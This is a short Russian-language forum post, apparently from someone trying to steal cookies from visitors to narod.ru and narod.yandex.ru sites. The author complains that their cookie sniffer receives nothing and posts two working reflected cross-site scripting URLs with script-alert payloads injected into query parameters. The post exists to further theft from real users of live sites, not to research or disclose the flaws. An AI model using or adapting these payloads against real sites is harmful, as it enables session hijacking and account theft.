К сожалению куки не идут, я такой запрос уже пробовал.

На саите даны 2 уязвимости, может вторая сработает, но как только я не подставлял ссылку на снифер, ниодного кука я не получил.

Пример №1:
http://narod.yandex.ru/rubrics/top100.xhtml?sort=xaxa><script>alert('Bug')</script><a%20a=&c=2xaxa
Пример №2:
http://www.narod.ru/guestbook/?owner=1&mainhtml=gb.txt&messageshtml=%3Cscript%3E alert('x')%3C/script%3E